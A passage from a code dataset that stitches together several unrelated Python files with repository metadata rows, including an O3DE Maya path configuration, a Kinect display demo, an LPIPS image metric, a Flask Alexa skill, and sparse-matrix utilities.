DCCSI_MAYA_SCRIPT_MEL_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts', 'Mel').as_posix()
DCCSI_MAYA_SCRIPT_PY_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts', 'Python').as_posix()
MAYA_SCRIPT_PATH = Path(DCCSI_MAYA_SCRIPT_PATH).as_posix() # extend %MAYA_SCRIPT_PATH%
# to do: remove or extend next PR, technically there can be more then one script path specified
#while MAYA_SCRIPT_PATH:
#if ENVAR_MAYA_SCRIPT_PATH in os.environ:
#maya_script_pathlist = os.getenv(ENVAR_MAYA_SCRIPT_PATH).split(os.pathsep)
#maya_script_new_pathlist = maya_script_pathlist.copy()
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_MEL_PATH)
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_PY_PATH)
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_PATH)
#os.environ[ENVAR_MAYA_SCRIPT_PATH] = os.pathsep.join(maya_script_new_pathlist)
#else:
#os.environ[ENVAR_MAYA_SCRIPT_PATH] = os.pathsep.join( (DCCSI_MAYA_SCRIPT_PATH,
#DCCSI_MAYA_SCRIPT_PY_PATH,
#DCCSI_MAYA_SCRIPT_MEL_PATH) )
#MAYA_SCRIPT_PATH = os.getenv(ENVAR_MAYA_SCRIPT_PATH, "< NOT SET >")
#break
# is a maya envar
MAYA_VP2_DEVICE_OVERRIDE="VirtualDeviceDx11"
MAYA_OGS_DEVICE_OVERRIDE="VirtualDeviceDx11"
DCCSI_MAYA_WIKI_URL = 'https://github.com/o3de/o3de/wiki/O3DE-DCCsi-Tools-DCC-Maya'
# reference, here is a list of Maya envars
# https://github.com/mottosso/Maya-Environment-Variables/blob/master/README.md
# -------------------------------------------------------------------------
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
    """Run this file as a standalone script"""
    # happy print
    _LOGGER.info(STR_CROSSBAR)
    _LOGGER.info('~ {}.py ... Running script as __main__'.format(_MODULENAME))
    _LOGGER.info(STR_CROSSBAR)
    # global debug stuff
    _DCCSI_GDEBUG = env_bool(ENVAR_DCCSI_GDEBUG, True)
    _DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, True)
    _DCCSI_LOGLEVEL = int(env_bool(ENVAR_DCCSI_LOGLEVEL, _logging.INFO))
    if _DCCSI_GDEBUG:
        # override loglevel if running debug
        _DCCSI_LOGLEVEL = _logging.DEBUG
    # configure basic logger
    # note: not using a common logger to reduce cyclical imports
    _logging.basicConfig(level=_DCCSI_LOGLEVEL,
                         format=FRMT_LOG_LONG,
                         datefmt='%m-%d %H:%M')
    # re-configure basic logger for debug
    _LOGGER = _logging.getLogger(_MODULENAME)
    # this is just a debug developer convenience print (for testing access)
    import pkgutil
    _LOGGER.info('Current working dir: {0}'.format(os.getcwd()))
    search_path = ['.'] # set to None to see all modules importable from sys.path
    all_modules = [x[1] for x in pkgutil.iter_modules(path=search_path)]
    _LOGGER.info('All Available Modules in working dir: {0}'.format(all_modules))
    # override based on current executable
    PATH_DCCSI_PYTHON_LIB = STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
                                                             sys.version_info.major,
                                                             sys.version_info.minor)
    PATH_DCCSI_PYTHON_LIB = Path(PATH_DCCSI_PYTHON_LIB).as_posix()
    # test anything procedurally generated
    _LOGGER.info('Testing procedural env paths ...')
    from pathlib import Path
    _stash_dict = {}
    _stash_dict['O3DE_DEV'] = Path(PATH_O3DE_DEV)
    _stash_dict['PATH_DCCSIG'] = Path(PATH_DCCSIG)
    _stash_dict['DCCSI_AZPY_PATH'] = Path(PATH_DCCSI_AZPY_PATH)
    _stash_dict['PATH_DCCSI_TOOLS'] = Path(PATH_DCCSI_TOOLS)
    _stash_dict['PATH_DCCSI_PYTHON_LIB'] = Path(PATH_DCCSI_PYTHON_LIB)
    _stash_dict['PATH_DCCSI_TOOLS_MAYA'] = Path(PATH_DCCSI_TOOLS_MAYA)
    _stash_dict['MAYA_LOCATION'] = Path(MAYA_LOCATION)
    _stash_dict['DCCSI_MAYA_EXE'] = Path(DCCSI_MAYA_EXE)
    _stash_dict['DCCSI_PY_MAYA'] = Path(DCCSI_PY_MAYA)
    _stash_dict['MAYA_SCRIPT_PATH'] = Path(MAYA_SCRIPT_PATH)
    # ---------------------------------------------------------------------
    # py 2 and 3 compatible iter
    # NOTE(review): get_items / PATH_DCCSI_AZPY_PATH / STR_CROSSBAR appear to
    # come from the `azpy.constants` star-import -- confirm they exist there.
    for key, value in get_items(_stash_dict):
        # check if path exists
        try:
            value.exists()
            _LOGGER.info('{0}: {1}'.format(key, value))
        except Exception as e:
            _LOGGER.warning('FAILED PATH: {}'.format(e))
    # custom prompt
    sys.ps1 = "[{}]>>".format(_MODULENAME)
# NOTE(review): indentation was lost upstream; this timing line is placed at
# module level so it always reports import time -- confirm against upstream.
_LOGGER.debug('{0} took: {1} sec'.format(_MODULENAME, timeit.default_timer() - _START))
# --- END -----------------------------------------------------------------
| 41.144543 | 99 | 0.674649 |
c03733662ac655fa4e1af62db62b069a9399ac49 | 1,958 | py | Python | lib/data/finetune_imagenet.py | liqi17thu/Stand-Alone-Self-Attention | 43c016ca14a9f5ce7ab59eefe2c41d96df04d151 | [
"MIT"
] | 1 | 2020-11-29T15:59:07.000Z | 2020-11-29T15:59:07.000Z | lib/data/finetune_imagenet.py | liqi17thu/Stand-Alone-Self-Attention | 43c016ca14a9f5ce7ab59eefe2c41d96df04d151 | [
"MIT"
] | null | null | null | lib/data/finetune_imagenet.py | liqi17thu/Stand-Alone-Self-Attention | 43c016ca14a9f5ce7ab59eefe2c41d96df04d151 | [
"MIT"
] | null | null | null | import torch
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from lib.data.data_util import ImageNetPolicy, ToBGRTensor
from lib.config import cfg
from lib.data.transformer_v2 import get_transforms
| 35.6 | 110 | 0.689479 |
c03974668d2a1ee4545cf6fd342d588c2d650bb4 | 6,519 | py | Python | test/acceptance/test_kamma.py | marceljanerfont/kamma | a1dfaf06475ebb2feb50ac1e6fd8eb79b2beda68 | [
"MIT"
] | 1 | 2017-06-05T04:40:01.000Z | 2017-06-05T04:40:01.000Z | test/acceptance/test_kamma.py | marceljanerfont/kamma | a1dfaf06475ebb2feb50ac1e6fd8eb79b2beda68 | [
"MIT"
] | 2 | 2017-06-29T14:23:59.000Z | 2017-06-29T14:24:58.000Z | test/acceptance/test_kamma.py | marceljanerfont/kamma | a1dfaf06475ebb2feb50ac1e6fd8eb79b2beda68 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
try:
import unittest2 as unittest
except ImportError:
import unittest
from multiprocessing import Manager
from random import randint
import logging
import sys
import os
import copy
import shutil
# add kamma path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))
import kamma
TEST_PATH = "test_queue"
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)-8s] [%(name)-10s] [%(lineno)-4d] %(message)s'))
logger_kamma = logging.getLogger('kamma.app')
logger_kamma.handlers = [handler]
# logger_kamma.setLevel(logging.DEBUG)
logger_fqueue = logging.getLogger('kamma.queue')
logger_fqueue.handlers = [handler]
# logger_fqueue.setLevel(logging.DEBUG)
logger_task = logging.getLogger('kamma.task')
logger_task.handlers = [handler]
# logger_task.setLevel(logging.DEBUG)
logger = logging.getLogger('test')
logger.handlers = [handler]
logger.setLevel(logging.DEBUG)
# it should be out of the class scope, otherwise
# python tries to pickle all class and its manager and then
# the serialization will fail
the_manager = None
if __name__ == '__main__':
unittest.main()
| 33.953125 | 144 | 0.666973 |
c03a48434d8a8fb57465d077a992cea579fd3c43 | 855 | py | Python | wrappers/python/demo_mp_sync.py | Qworg/libfreenect | 4cca607b37debdd006c3e693954292da11402a7e | [
"Apache-2.0"
] | 10 | 2020-03-09T02:31:01.000Z | 2021-12-14T18:29:27.000Z | wrappers/python/demo_mp_sync.py | Qworg/libfreenect | 4cca607b37debdd006c3e693954292da11402a7e | [
"Apache-2.0"
] | null | null | null | wrappers/python/demo_mp_sync.py | Qworg/libfreenect | 4cca607b37debdd006c3e693954292da11402a7e | [
"Apache-2.0"
] | 1 | 2018-06-23T04:58:30.000Z | 2018-06-23T04:58:30.000Z | #!/usr/bin/env python
import freenect
import matplotlib.pyplot as mp
import frame_convert
import signal
keep_running = True
def handler(signum, frame):
    """SIGINT handler: clear the module-level ``keep_running`` flag so the
    display loop below exits on the next iteration.

    Args:
        signum: signal number delivered by the OS (unused).
        frame: interrupted stack frame (unused).
    """
    global keep_running
    keep_running = False
# Interactive matplotlib setup: non-blocking drawing with a grayscale colormap.
mp.ion()
mp.gray()
# Figure 1 shows the depth stream, figure 2 the RGB stream.
# NOTE(review): get_depth()/get_video() are not defined in this excerpt --
# presumably freenect.sync_get_* wrappers defined elsewhere in the file.
mp.figure(1)
image_depth = mp.imshow(get_depth(), interpolation='nearest', animated=True)
mp.figure(2)
image_rgb = mp.imshow(get_video(), interpolation='nearest', animated=True)
print('Press Ctrl-C in terminal to stop')
# Install the SIGINT handler that flips keep_running to False.
signal.signal(signal.SIGINT, handler)
# Refresh both figures until Ctrl-C is received.
while keep_running:
    mp.figure(1)
    image_depth.set_data(get_depth())
    mp.figure(2)
    image_rgb.set_data(get_video())
    mp.draw()
    mp.waitforbuttonpress(0.01)
c03ae4d1c246454dbef54627c8b2804bc08c11f8 | 1,189 | py | Python | codes/models/modules/LPIPS/compute_dists.py | DinJerr/BasicSR | b992a386e63daed5193b775080b9066ff2421d85 | [
"Apache-2.0"
] | 5 | 2020-06-07T18:07:45.000Z | 2020-09-06T02:13:52.000Z | codes/models/modules/LPIPS/compute_dists.py | DinJerr/BasicSR | b992a386e63daed5193b775080b9066ff2421d85 | [
"Apache-2.0"
] | null | null | null | codes/models/modules/LPIPS/compute_dists.py | DinJerr/BasicSR | b992a386e63daed5193b775080b9066ff2421d85 | [
"Apache-2.0"
] | 1 | 2020-06-28T05:55:41.000Z | 2020-06-28T05:55:41.000Z | #import models
from models.modules.LPIPS import perceptual_loss as models
####################
# metric
####################
model = None
def calculate_lpips(img1_im, img2_im, use_gpu=False, net='squeeze', spatial=False):
    '''Calculate the LPIPS perceptual distance between two images.

    Args:
        img1_im, img2_im: BGR images with values in [0, 255] (HWC arrays);
            converted internally to RGB tensors in [-1, 1].
        use_gpu: move the input tensors (and the model, on first call) to CUDA.
        net: LPIPS backbone name ('squeeze' is the smallest, cheapest on CPU).
        spatial: if True the model yields a spatial map, averaged to a scalar.

    Returns:
        the perceptual distance (torch tensor).
    '''
    global model
    ## Initializing the model
    # squeeze is much smaller, needs less RAM to load and execute in CPU during training
    # NOTE(review): the model is cached on first use; later calls with a
    # different net/use_gpu/spatial silently reuse the first model -- confirm intended.
    if model is None:
        model = models.PerceptualLoss(model='net-lin',net=net,use_gpu=use_gpu,spatial=spatial)
    # Load images to tensors; [:,:,::-1] flips BGR -> RGB, im2tensor rescales to [-1, 1]
    img1 = models.im2tensor(img1_im[:,:,::-1]) # RGB image from [-1,1]
    img2 = models.im2tensor(img2_im[:,:,::-1]) # RGB image from [-1,1]
    if(use_gpu):
        img1 = img1.cuda()
        img2 = img2.cuda()
    # Compute distance
    if spatial==False:
        dist01 = model.forward(img2,img1)
    else:
        dist01 = model.forward(img2,img1).mean() # Add .mean, if using add spatial=True
    #print('Distance: %.3f'%dist01) #%.8f
    return dist01
| 27.651163 | 94 | 0.612279 |
c03b78905f8ecc14f0212e38dfa62f635acd9408 | 59,338 | py | Python | msgraph-cli-extensions/v1_0/sites_v1_0/azext_sites_v1_0/vendored_sdks/sites/models/_sites_enums.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/sites_v1_0/azext_sites_v1_0/vendored_sdks/sites/models/_sites_enums.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/sites_v1_0/azext_sites_v1_0/vendored_sdks/sites/models/_sites_enums.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
| 30.259052 | 119 | 0.701945 |
c03be9166bd151ec0d6a3cb24a69aeb0b4160c8e | 456 | py | Python | evntbus/decorators.py | jmwri/eventbus | fe91ab2486b99bffb0232c23d45d0c5dedce1b42 | [
"MIT"
] | null | null | null | evntbus/decorators.py | jmwri/eventbus | fe91ab2486b99bffb0232c23d45d0c5dedce1b42 | [
"MIT"
] | null | null | null | evntbus/decorators.py | jmwri/eventbus | fe91ab2486b99bffb0232c23d45d0c5dedce1b42 | [
"MIT"
] | null | null | null | import typing
if typing.TYPE_CHECKING:
from evntbus.bus import Bus
| 25.333333 | 66 | 0.644737 |
c03c898e35d62712b812e780c7c19ccba395542b | 1,481 | py | Python | src/shortcircuit/model/crestprocessor.py | farshield/shortcircu | 87d45ea85b78e3e7da72b7b44755dc429b4fdf5a | [
"MIT"
] | 35 | 2016-06-22T20:07:31.000Z | 2021-04-07T11:02:08.000Z | src/shortcircuit/model/crestprocessor.py | farshield/shortcircu | 87d45ea85b78e3e7da72b7b44755dc429b4fdf5a | [
"MIT"
] | 15 | 2016-06-17T09:36:02.000Z | 2020-10-30T11:39:07.000Z | src/shortcircuit/model/crestprocessor.py | farshield/shortcircu | 87d45ea85b78e3e7da72b7b44755dc429b4fdf5a | [
"MIT"
] | 16 | 2016-10-02T16:09:18.000Z | 2021-05-29T02:51:14.000Z | # crestprocessor.py
import threading
from PySide import QtCore
from crest.crest import Crest
| 29.62 | 107 | 0.704929 |
c03d2bdffd5f75d12bc1d6868d5c20f3a01b1c33 | 4,496 | py | Python | src/commands/pipelines.py | vicobits/sawi-cli | 0e3717e0e3d853599b87f8ea147a3f1e9566344b | [
"MIT"
] | 1 | 2019-05-02T05:16:07.000Z | 2019-05-02T05:16:07.000Z | src/commands/pipelines.py | vicobits/wise-cli | 0e3717e0e3d853599b87f8ea147a3f1e9566344b | [
"MIT"
] | null | null | null | src/commands/pipelines.py | vicobits/wise-cli | 0e3717e0e3d853599b87f8ea147a3f1e9566344b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import click
from src.commands.project import Project
from src.commands.server import Server
from src.commands.config import WebServer
from src.common.context import CommandContext
from src.common.decorators import settings, update_config_file
| 28.636943 | 99 | 0.635899 |
c03e4bfd7eee3d8023944a7e3e5535ae1233ba11 | 1,341 | py | Python | build.py | jmetzz/coffee-chatbot | da7e76d9532c8e5e38a47a19ffed1f1e27601766 | [
"MIT"
] | null | null | null | build.py | jmetzz/coffee-chatbot | da7e76d9532c8e5e38a47a19ffed1f1e27601766 | [
"MIT"
] | null | null | null | build.py | jmetzz/coffee-chatbot | da7e76d9532c8e5e38a47a19ffed1f1e27601766 | [
"MIT"
] | null | null | null | from pybuilder.core import use_plugin, init
use_plugin("python.core")
use_plugin("python.unittest")
use_plugin("python.install_dependencies")
use_plugin("python.flake8")
use_plugin("python.coverage")
name = "ActionServerPybuilder"
default_task = ['install_dependencies', 'analyze', 'publish']
| 35.289474 | 78 | 0.774049 |
c03eda4a030a4816bf3db4784bc7ac9588f4b176 | 4,278 | py | Python | electrumsv/devices/hw_wallet/plugin.py | tuoshao/electrumsv | 5f0132cafa2c90bb36c8a574874e027e44a637e6 | [
"MIT"
] | 1 | 2021-12-28T10:52:11.000Z | 2021-12-28T10:52:11.000Z | electrumsv/devices/hw_wallet/plugin.py | SomberNight/electrumsv | 28262e3cab7b73e4960466f8aee252975953acf8 | [
"MIT"
] | null | null | null | electrumsv/devices/hw_wallet/plugin.py | SomberNight/electrumsv | 28262e3cab7b73e4960466f8aee252975953acf8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- mode: python -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2016 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.util import versiontuple
from .cmdline import CmdLineHandler
| 39.611111 | 97 | 0.679056 |
c0418cbebf8e032e1171fe327cac277a1bbb13e1 | 631 | py | Python | api_service/tests/test_model_ids.py | seattleflu/Seattle-Flu-Incidence-Mapper | 2b72e53da974874b98e1811cdb77e170c33999f1 | [
"MIT"
] | 6 | 2019-03-22T18:28:04.000Z | 2021-02-23T03:53:19.000Z | api_service/tests/test_model_ids.py | seattleflu/Seattle-Flu-Incidence-Mapper | 2b72e53da974874b98e1811cdb77e170c33999f1 | [
"MIT"
] | 103 | 2019-04-03T15:30:06.000Z | 2021-11-15T17:48:22.000Z | api_service/tests/test_model_ids.py | seattleflu/incidence-mapper | 2b72e53da974874b98e1811cdb77e170c33999f1 | [
"MIT"
] | 6 | 2019-07-01T04:43:44.000Z | 2021-02-13T21:46:18.000Z | import unittest
from seattle_flu_incidence_mapper.utils import get_model_id
| 39.4375 | 163 | 0.681458 |
c04331c5a5c72cc4fd22977bf1a531a2facdca4e | 445 | py | Python | Cleaning.py | TharindraParanagama/MovieClassification | 2cdee9a2aaf1f55d0a59b20181e69c524c4d5895 | [
"MIT"
] | null | null | null | Cleaning.py | TharindraParanagama/MovieClassification | 2cdee9a2aaf1f55d0a59b20181e69c524c4d5895 | [
"MIT"
] | null | null | null | Cleaning.py | TharindraParanagama/MovieClassification | 2cdee9a2aaf1f55d0a59b20181e69c524c4d5895 | [
"MIT"
] | null | null | null | import csv
input = open('MovieI.csv', 'rb')
output = open('MovieO.csv', 'wb')
writer = csv.writer(output)
for row in csv.reader(input):
for i in range(len(row)):
if(row[0]==''):
break
elif(row[1]==''):
break
elif(row[2]==''):
break
elif(row[3]==''):
break
elif(row[4]==''):
break
else :writer.writerow(row)
input.close()
output.close() | 21.190476 | 33 | 0.483146 |
c0451d8d32195eb2257b24e61657609915f300f2 | 87 | py | Python | venues/apps.py | danroberts728/hsvdotbeer | 5b977bf4a7aab149ad56564b3adbb09424500308 | [
"Apache-2.0"
] | 18 | 2018-12-06T01:46:37.000Z | 2021-10-17T10:37:17.000Z | venues/apps.py | danroberts728/hsvdotbeer | 5b977bf4a7aab149ad56564b3adbb09424500308 | [
"Apache-2.0"
] | 194 | 2018-11-04T12:50:49.000Z | 2022-01-06T22:43:43.000Z | venues/apps.py | danroberts728/hsvdotbeer | 5b977bf4a7aab149ad56564b3adbb09424500308 | [
"Apache-2.0"
] | 7 | 2019-03-18T05:36:06.000Z | 2020-12-25T03:27:29.000Z | from django.apps import AppConfig
| 14.5 | 33 | 0.747126 |
c045d1511440dddecfef10dbcd54c672252a332e | 1,137 | py | Python | problems/remove-duplicates-from-sorted-list.py | sailikhithk/tech-interview-prep | e833764cf98915d56118bddfa0e01871c58de75e | [
"Apache-2.0"
] | null | null | null | problems/remove-duplicates-from-sorted-list.py | sailikhithk/tech-interview-prep | e833764cf98915d56118bddfa0e01871c58de75e | [
"Apache-2.0"
] | null | null | null | problems/remove-duplicates-from-sorted-list.py | sailikhithk/tech-interview-prep | e833764cf98915d56118bddfa0e01871c58de75e | [
"Apache-2.0"
] | null | null | null | """
The key is to use a set to remember if we seen the node or not.
Next, think about how we are going to *remove* the duplicate node?
The answer is to simply link the previous node to the next node.
So we need to keep a pointer `prev` on the previous node as we iterate the linked list.
So, the solution.
Create a set `seen`. #[1]
Point pointer `prev` on the first node. `cuur` on the second.
Now we iterate trough the linked list.
* For every node, we add its value to `seen`. Move `prev` and `curr` forward. #[2]
* If we seen the node, we *remove* the `curr` node. Then move the curr forward. #[3]
Return the `head`
"""
| 34.454545 | 88 | 0.602463 |
c046ab37f041136a24de450d5779fbb10cbaed54 | 3,344 | py | Python | corehq/apps/analytics/signals.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2020-05-05T13:10:01.000Z | 2020-05-05T13:10:01.000Z | corehq/apps/analytics/signals.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2019-12-09T14:00:14.000Z | 2019-12-09T14:00:14.000Z | corehq/apps/analytics/signals.py | MaciejChoromanski/commcare-hq | fd7f65362d56d73b75a2c20d2afeabbc70876867 | [
"BSD-3-Clause"
] | 5 | 2015-11-30T13:12:45.000Z | 2019-07-01T19:27:07.000Z | from __future__ import absolute_import
from __future__ import unicode_literals
import six
from django.conf import settings
from django.contrib.auth.signals import user_logged_in
from corehq.apps.analytics.tasks import (
track_user_sign_in_on_hubspot,
HUBSPOT_COOKIE,
update_hubspot_properties,
identify,
update_subscription_properties_by_domain, get_subscription_properties_by_user)
from corehq.apps.analytics.utils import get_meta
from corehq.apps.registration.views import ProcessRegistrationView
from corehq.util.decorators import handle_uncaught_exceptions
from corehq.util.python_compatibility import soft_assert_type_text
from corehq.util.soft_assert import soft_assert
from django.dispatch import receiver
from django.urls import reverse
from corehq.apps.users.models import CouchUser
from corehq.apps.accounting.signals import subscription_upgrade_or_downgrade
from corehq.apps.domain.signals import commcare_domain_post_save
from corehq.apps.users.signals import couch_user_post_save
from corehq.apps.analytics.utils import get_instance_string
_no_cookie_soft_assert = soft_assert(to=['{}@{}'.format('cellowitz', 'dimagi.com'),
'{}@{}'.format('biyeun', 'dimagi.com'),
'{}@{}'.format('jschweers', 'dimagi.com')],
send_to_ops=False)
def get_domain_membership_properties(couch_user):
    """Build the analytics properties describing the user's project-space memberships."""
    prefix = get_instance_string()
    domains = couch_user.domains
    return {
        "{}number_of_project_spaces".format(prefix): len(domains),
        "{}project_spaces_list".format(prefix): '\n'.join(domains),
    }
| 39.341176 | 99 | 0.720993 |
c046c72c4e753549e8ec891d9f48179094bc06ed | 775 | py | Python | manage.py | BeyondLam/Flask_Blog_Python3 | 274c932e9ea28bb6c83335e408a2cd9f1cf4fcb6 | [
"Apache-2.0"
] | 2 | 2019-10-25T16:35:41.000Z | 2019-10-26T10:54:00.000Z | manage.py | BeyondLam/Flask_Blog_Python3 | 274c932e9ea28bb6c83335e408a2cd9f1cf4fcb6 | [
"Apache-2.0"
] | null | null | null | manage.py | BeyondLam/Flask_Blog_Python3 | 274c932e9ea28bb6c83335e408a2cd9f1cf4fcb6 | [
"Apache-2.0"
] | null | null | null | from app import create_app, db
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
app = create_app("develop")
manager = Manager(app)
Migrate(app, db)
manager.add_command("db", MigrateCommand)
# ,manager
if __name__ == '__main__':
manager.run() | 27.678571 | 101 | 0.707097 |
c047ab7812a83340a4a3ccb035cf5db37d2b6b67 | 2,954 | py | Python | qiling/qiling/cc/intel.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:01.000Z | 2021-06-04T14:27:15.000Z | qiling/qiling/cc/intel.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | null | null | null | qiling/qiling/cc/intel.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:09.000Z | 2021-06-04T14:27:21.000Z | #!/usr/bin/env python3
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
from unicorn.x86_const import (
UC_X86_REG_AX, UC_X86_REG_EAX, UC_X86_REG_RAX, UC_X86_REG_RCX,
UC_X86_REG_RDI, UC_X86_REG_RDX, UC_X86_REG_RSI, UC_X86_REG_R8,
UC_X86_REG_R9, UC_X86_REG_R10
)
from qiling import Qiling
from . import QlCommonBaseCC
| 26.854545 | 122 | 0.728842 |
c048a21dfcef4ce86fe3963107c1c071b1d5b9b1 | 2,639 | py | Python | Alexa_Dynamo.py | gnomesoup/pyDynamo | dea046e96f7973fcb6c28a274a3092b246457551 | [
"Unlicense",
"MIT"
] | null | null | null | Alexa_Dynamo.py | gnomesoup/pyDynamo | dea046e96f7973fcb6c28a274a3092b246457551 | [
"Unlicense",
"MIT"
] | null | null | null | Alexa_Dynamo.py | gnomesoup/pyDynamo | dea046e96f7973fcb6c28a274a3092b246457551 | [
"Unlicense",
"MIT"
] | null | null | null | ### ----------- Python Code ------------###
import csv
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import pandas as pd
### ------------- Start Alexa Stuff ---------###
app = Flask(__name__)
ask = Ask(app, "/")
#logging.getLogger("flask_ask").setLevel(logging.DEBUG)
### ----------- Switch Function --------------###
### ----------- Switch Function --------------###
### ----------- Launch Skill --------------###
### -------------- Say Hello --------------- ####
### -------------- Create Points --------------- ####
### -------------- Create Connection --------------- ####
### -------------- Create Framing --------------- ####
### -------------- Reset --------------- ####
### -------------- Count Framing --------------- ####
### --------------- Port for Ngrok -------------##
# Script entry point: serve the Flask/Ask app on all interfaces at a fixed
# port so an ngrok tunnel can point at it.
if __name__ == '__main__':
    port = 9000 #the custom port you want
    app.run(host='0.0.0.0', port=port)
    # NOTE(review): app.run() above blocks until shutdown, so this second call
    # with debug=True is unreachable dead code -- confirm and remove.
    app.run(debug=True)
c04935b8a935560d2540de8efce949baca20ee57 | 846 | py | Python | HW/hklearn/model.py | leguiart/Machine-Learning | 2fd3c583fbfd8fc3ee12c9106db7b4dfa29bc253 | [
"MIT"
] | null | null | null | HW/hklearn/model.py | leguiart/Machine-Learning | 2fd3c583fbfd8fc3ee12c9106db7b4dfa29bc253 | [
"MIT"
] | null | null | null | HW/hklearn/model.py | leguiart/Machine-Learning | 2fd3c583fbfd8fc3ee12c9106db7b4dfa29bc253 | [
"MIT"
] | null | null | null | import abc
'''
Interfaz sobre la cual todo modelo implementa.
Todo modelo dentro de la biblioteca hklearn implementa
los siguientes comportamientos:
-fit : Entrena el modelo con un a matriz de ejemplos X y sus respectivas etiquetas y
-predict : El modelo entrenado, predice con base en una entrada X
de ejemplos
'''
| 31.333333 | 89 | 0.640662 |
c0499e4593031598062f2a6d6d126c43c5ef1d2d | 35,951 | py | Python | pecos/utils/smat_util.py | UniqueUpToPermutation/pecos | 52dba0b6a1d5d0809838ac9ddb6c02a93da2624e | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2021-07-28T21:09:58.000Z | 2021-09-24T03:37:45.000Z | pecos/utils/smat_util.py | UniqueUpToPermutation/pecos | 52dba0b6a1d5d0809838ac9ddb6c02a93da2624e | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | pecos/utils/smat_util.py | UniqueUpToPermutation/pecos | 52dba0b6a1d5d0809838ac9ddb6c02a93da2624e | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2021-09-24T04:00:47.000Z | 2021-09-24T04:00:47.000Z | # Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
import collections
import numpy as np
import scipy.sparse as smat
def cs_matrix(arg1, mat_type, shape=None, dtype=None, copy=False, check_contents=False):
    """Custom compressed sparse matrix constructor that allows indices and indptr to be stored in different types.

    Args:
        arg1 (tuple): (data, indices, indptr) to construct compressed sparse matrix
        mat_type (type): the matrix type to construct, one of [scipy.sparse.csr_matrix | scipy.sparse.csc_matrix]
        shape (tuple, optional): shape of the matrix, default None to infer from arg1
        dtype (type, optional): type of values in the matrix, default None to infer from data
        copy (bool, optional): whether to copy the input arrays, defaults to False
        check_contents (bool, optional): whether to check array contents to determine dtype, defaults to False

    Returns:
        compressed sparse matrix in mat_type

    Raises:
        ValueError: if shape is None and the dimensions cannot be inferred from arg1
    """
    (data, indices, indptr) = arg1
    # scipy.sparse.sputils was made private in scipy >= 1.8 and later removed
    # from the public namespace; fall back to the private location.
    try:
        get_index_dtype = smat.sputils.get_index_dtype
    except AttributeError:
        from scipy.sparse._sputils import get_index_dtype
    # Pick the smallest safe index dtype for each array independently;
    # scipy's own constructor would coerce both to one common dtype.
    indices_dtype = get_index_dtype(indices, check_contents=check_contents)
